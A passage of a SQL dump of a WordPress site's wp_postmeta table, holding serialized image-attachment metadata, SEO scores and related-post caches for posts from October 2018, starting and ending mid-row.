(9239, 4099, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/10/43372313_689079111468280_8373507590771965952_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"43372313_689079111468280_8373507590771965952_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"43372313_689079111468280_8373507590771965952_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"43372313_689079111468280_8373507590771965952_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"43372313_689079111468280_8373507590771965952_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"43372313_689079111468280_8373507590771965952_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9240, 4098, '_thumbnail_id', '4099'),
(9244, 4098, '_hide_featured', NULL),
(9245, 4098, '_yoast_wpseo_content_score', '30'),
(9246, 4098, '_yoast_wpseo_primary_category', '31'),
(9247, 4098, '_wpas_done_all', '1'),
(9248, 4101, '_edit_lock', '1539141666:3'),
(9249, 4101, '_edit_last', '3'),
(9250, 4102, '_wp_attached_file', '2018/10/43421431_689187031457488_8469058612969340928_o.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(9251, 4102, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/10/43421431_689187031457488_8469058612969340928_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"43421431_689187031457488_8469058612969340928_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"43421431_689187031457488_8469058612969340928_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"43421431_689187031457488_8469058612969340928_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"43421431_689187031457488_8469058612969340928_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"43421431_689187031457488_8469058612969340928_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9252, 4101, '_thumbnail_id', '4102'),
(9256, 4101, '_hide_featured', NULL),
(9257, 4101, '_yoast_wpseo_content_score', '30'),
(9258, 4101, '_yoast_wpseo_primary_category', '31'),
(9259, 4101, '_wpas_done_all', '1'),
(9260, 4098, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575337247;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6156;}i:1;a:1:{s:2:\"id\";i:6176;}i:2;a:1:{s:2:\"id\";i:6054;}}}}'),
(9261, 4101, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575275040;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3988;}i:1;a:1:{s:2:\"id\";i:4975;}i:2;a:1:{s:2:\"id\";i:4971;}}}}'),
(9262, 4104, '_edit_lock', '1539403470:3'),
(9263, 4104, '_edit_last', '3'),
(9264, 4105, '_wp_attached_file', '2018/10/ประกาศรายชื่อผู้มีสิทธ์สอบคัดเลือก-เป็นลูกจ้างชั่วคราว-.pdf'),
(9268, 4104, '_hide_featured', NULL),
(9269, 4104, '_yoast_wpseo_content_score', '60'),
(9270, 4104, '_yoast_wpseo_primary_category', '3'),
(9271, 4104, '_wpas_done_all', '1'),
(9272, 4104, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574739169;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(9273, 4107, '_edit_lock', '1539744109:3'),
(9274, 4107, '_edit_last', '3'),
(9275, 4108, '_wp_attached_file', '2018/10/DSC_1674.jpg'),
(9276, 4108, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2018/10/DSC_1674.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC_1674-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC_1674-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC_1674-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC_1674-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"DSC_1674-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9277, 4111, '_wp_attached_file', '2018/10/DSC_1693.jpg'),
(9278, 4111, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2018/10/DSC_1693.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC_1693-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC_1693-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC_1693-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC_1693-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"DSC_1693-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9279, 4112, '_wp_attached_file', '2018/10/DSC_1679.jpg'),
(9280, 4112, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:1706;s:4:\"file\";s:20:\"2018/10/DSC_1679.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC_1679-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC_1679-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"DSC_1679-768x1365.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC_1679-576x1024.jpg\";s:5:\"width\";i:576;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"DSC_1679-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9281, 4113, '_wp_attached_file', '2018/10/DSC_1680.jpg'),
(9282, 4113, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2018/10/DSC_1680.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC_1680-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC_1680-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC_1680-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC_1680-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"DSC_1680-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9287, 4117, '_wp_attached_file', '2018/10/DSC_1675.jpg'),
(9288, 4117, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1576;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2018/10/DSC_1675.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC_1675-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC_1675-300x183.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC_1675-768x468.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:468;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC_1675-1024x624.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:624;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"DSC_1675-400x244.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:244;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9289, 4118, '_wp_attached_file', '2018/10/DSC_1678.jpg'),
(9290, 4118, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:1706;s:4:\"file\";s:20:\"2018/10/DSC_1678.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC_1678-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC_1678-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"DSC_1678-768x1365.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC_1678-576x1024.jpg\";s:5:\"width\";i:576;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"DSC_1678-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9291, 4120, '_wp_attached_file', '2018/10/DSC_1681.jpg'),
(9292, 4120, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2018/10/DSC_1681.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC_1681-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC_1681-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC_1681-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC_1681-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"DSC_1681-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9293, 4122, '_wp_attached_file', '2018/10/DSC_1683.jpg'),
(9294, 4122, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2018/10/DSC_1683.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC_1683-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC_1683-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC_1683-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC_1683-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"DSC_1683-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9295, 4124, '_wp_attached_file', '2018/10/Picture-165.jpg'),
(9296, 4124, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:23:\"2018/10/Picture-165.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Picture-165-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Picture-165-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"Picture-165-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"Picture-165-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"Picture-165-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"EX-Z33\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1278927358\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"6.3\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9297, 4125, '_wp_attached_file', '2018/10/DSC_1686.jpg'),
(9298, 4125, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2018/10/DSC_1686.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC_1686-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC_1686-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC_1686-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC_1686-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"DSC_1686-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9299, 4126, '_wp_attached_file', '2018/10/DSC_1689.jpg'),
(9300, 4126, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:1706;s:4:\"file\";s:20:\"2018/10/DSC_1689.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC_1689-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC_1689-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"DSC_1689-768x1365.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1365;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC_1689-576x1024.jpg\";s:5:\"width\";i:576;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"DSC_1689-169x300.jpg\";s:5:\"width\";i:169;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9301, 4130, '_wp_attached_file', '2018/10/44043509_691289487913909_769305393779179520_o.jpg'),
(9302, 4130, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1440;s:6:\"height\";i:1080;s:4:\"file\";s:57:\"2018/10/44043509_691289487913909_769305393779179520_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"44043509_691289487913909_769305393779179520_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"44043509_691289487913909_769305393779179520_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"44043509_691289487913909_769305393779179520_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:58:\"44043509_691289487913909_769305393779179520_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"44043509_691289487913909_769305393779179520_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(9303, 4107, '_thumbnail_id', '4130'),
(9307, 4107, '_hide_featured', NULL),
(9308, 4107, '_yoast_wpseo_content_score', '30'),
(9309, 4107, '_wp_old_date', '2018-10-16'),
(9310, 4107, '_yoast_wpseo_primary_category', '31'),
(9311, 4107, '_wpas_done_all', '1'),
(9312, 4107, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575554686;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5388;}i:1;a:1:{s:2:\"id\";i:5671;}i:2;a:1:{s:2:\"id\";i:4751;}}}}'),
(9313, 4139, '_edit_lock', '1539863066:3'),
(9314, 4139, '_edit_last', '3'),
(9315, 4140, '_wp_attached_file', '2018/10/1539860875337.jpg'),
(9316, 4140, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:25:\"2018/10/1539860875337.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"1539860875337-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"1539860875337-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"1539860875337-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"1539860875337-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"1539860875337-225x300.jpg\";s:5:\"width\";i:225;s:6:\"h